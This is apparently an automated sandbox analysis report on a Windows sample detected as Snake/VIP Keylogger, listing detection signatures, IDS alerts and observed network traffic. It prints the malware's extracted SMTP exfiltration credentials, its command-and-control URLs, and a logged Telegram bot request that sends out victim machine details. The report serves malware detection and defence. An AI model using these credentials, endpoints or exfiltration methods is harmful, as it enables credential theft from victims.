Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lpjrd6Wxad.exe

Overview

General Information

Sample name:Lpjrd6Wxad.exe
renamed because original name is a hash value
Original sample name:51f52b4829b1930c3d4781e63ac08ccb74840c9b901b46b9f35274803e6d5571.exe
Analysis ID:1551190
MD5:2ba023727b7a6399471d26a38f26695a
SHA1:69d719ca185d62a737a2503a45b1b04cd097e190
SHA256:51f52b4829b1930c3d4781e63ac08ccb74840c9b901b46b9f35274803e6d5571
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Lpjrd6Wxad.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\Lpjrd6Wxad.exe" MD5: 2BA023727B7A6399471D26A38F26695A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Lpjrd6Wxad.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Lpjrd6Wxad.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      Lpjrd6Wxad.exeJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        Lpjrd6Wxad.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Lpjrd6Wxad.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d5cb:$a1: get_encryptedPassword
          • 0x2d8d8:$a2: get_encryptedUsername
          • 0x2d3e9:$a3: get_timePasswordChanged
          • 0x2d4e4:$a4: get_passwordField
          • 0x2d5e1:$a5: set_encryptedPassword
          • 0x2ec72:$a7: get_logins
          • 0x2ebd5:$a10: KeyLoggerEventArgs
          • 0x2e83a:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 2 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2d3cb:$a1: get_encryptedPassword
                  • 0x2d6d8:$a2: get_encryptedUsername
                  • 0x2d1e9:$a3: get_timePasswordChanged
                  • 0x2d2e4:$a4: get_passwordField
                  • 0x2d3e1:$a5: set_encryptedPassword
                  • 0x2ea72:$a7: get_logins
                  • 0x2e9d5:$a10: KeyLoggerEventArgs
                  • 0x2e63a:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 5 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.Lpjrd6Wxad.exe.850000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.0.Lpjrd6Wxad.exe.850000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      0.0.Lpjrd6Wxad.exe.850000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                        0.0.Lpjrd6Wxad.exe.850000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                          0.0.Lpjrd6Wxad.exe.850000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                          • 0x2d5cb:$a1: get_encryptedPassword
                          • 0x2d8d8:$a2: get_encryptedUsername
                          • 0x2d3e9:$a3: get_timePasswordChanged
                          • 0x2d4e4:$a4: get_passwordField
                          • 0x2d5e1:$a5: set_encryptedPassword
                          • 0x2ec72:$a7: get_logins
                          • 0x2ebd5:$a10: KeyLoggerEventArgs
                          • 0x2e83a:$a11: KeyLoggerEventArgsEventHandler
                          Click to see the 2 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Suspicious Outbound SMTP Connections
                          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Lpjrd6Wxad.exe, Initiated: true, ProcessId: 3648, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49728

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-07T15:19:43.784767+010020229301A Network Trojan was detected20.12.23.50443192.168.2.849714TCP
                          2024-11-07T15:20:22.004076+010020229301A Network Trojan was detected20.109.210.53443192.168.2.849729TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-07T15:19:33.661061+010028033053Unknown Traffic192.168.2.849708188.114.96.3443TCP
                          2024-11-07T15:19:43.626300+010028033053Unknown Traffic192.168.2.849717188.114.96.3443TCP
                          2024-11-07T15:19:46.123464+010028033053Unknown Traffic192.168.2.849722188.114.96.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-07T15:19:30.556068+010028032742Potentially Bad Traffic192.168.2.849706193.122.130.080TCP
                          2024-11-07T15:19:32.931122+010028032742Potentially Bad Traffic192.168.2.849706193.122.130.080TCP
                          2024-11-07T15:19:35.790706+010028032742Potentially Bad Traffic192.168.2.849709193.122.130.080TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: Lpjrd6Wxad.exeAvira: detected
                          Found malware configuration
                          Source: 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                          Source: 0.0.Lpjrd6Wxad.exe.850000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sesilebruce@elemacuae.com", "Password": "(lqKKXb5", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                          Multi AV Scanner detection for submitted file
                          Source: Lpjrd6Wxad.exeReversingLabs: Detection: 68%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for sample
                          Source: Lpjrd6Wxad.exeJoe Sandbox ML: detected

                          Location Tracking

                          barindex
                          Tries to detect the country of the analysis system (by using the IP)
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: Lpjrd6Wxad.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49707 version: TLS 1.0
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
                          Source: Lpjrd6Wxad.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_0102F4D0
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_0102FB03
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_0102FCE3
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582D829h0_2_0582D580
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582CF79h0_2_0582CCD0
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582C6C9h0_2_0582C420
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582F239h0_2_0582EF90
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 05822131h0_2_05821E80
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582E989h0_2_0582E6E0
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 058226F8h0_2_05822626
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582E0D9h0_2_0582DE30
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582DC81h0_2_0582D9D8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582D3D1h0_2_0582D128
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582021Dh0_2_05820040
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 05820BA7h0_2_05820040
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582FAE9h0_2_0582F840
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582CB21h0_2_0582C878
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582F691h0_2_0582F3E8
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582EDE1h0_2_0582EB38
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 0582E531h0_2_0582E288
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 058226F8h0_2_058222D6
                          Source: C:\Users\user\Desktop\Lpjrd6Wxad.exeCode function: 4x nop then jmp 058226F8h0_2_058222E0

                          Networking

                          barindex
                          Uses the Telegram API (likely for C&C communication)
                          Source: unknownDNS query: name: api.telegram.org
                          Yara detected Generic Downloader
                          Source: Yara matchFile source: Lpjrd6Wxad.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.Lpjrd6Wxad.exe.850000.0.unpack, type: UNPACKEDPE
                          Source: global trafficTCP traffic: 192.168.2.8:49728 -> 208.91.198.143:587
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2008/11/2024%20/%2006:12:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                          Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: checkip.dyndns.org
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 193.122.130.0:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49706 -> 193.122.130.0:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49729
                          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.8:49714
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 188.114.96.3:443
                          Source: global trafficTCP traffic: 192.168.2.8:49728 -> 208.91.198.143:587
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49707 version: TLS 1.0
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2008/11/2024%20/%2006:12:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: global trafficDNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 07 Nov 2024 14:19:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                          Source: Lpjrd6Wxad.exeString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                          Source: Lpjrd6Wxad.exeString found in binary or memory: http://aborters.duckdns.org:8081
                          Source: Lpjrd6Wxad.exeString found in binary or memory: http://anotherarmy.dns.army:8081
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                          Source: Lpjrd6Wxad.exeString found in binary or memory: http://checkip.dyndns.org/q
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                          Source: Lpjrd6Wxad.exeString found in binary or memory: http://varders.kozow.com:8081
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: Lpjrd6Wxad.exeString found in binary or memory: https://api.telegram.org/bot
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E82000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D1F000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                          Source: Lpjrd6Wxad.exeString found in binary or memory: https://reallyfreegeoip.org/xml/
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002DB7000.00000004.00000800.00020000.00000000.sdmp, Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002D8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79$
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4036590678.0000000003CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002EC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                          Source: Lpjrd6Wxad.exe, 00000000.00000002.4035317693.0000000002EBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
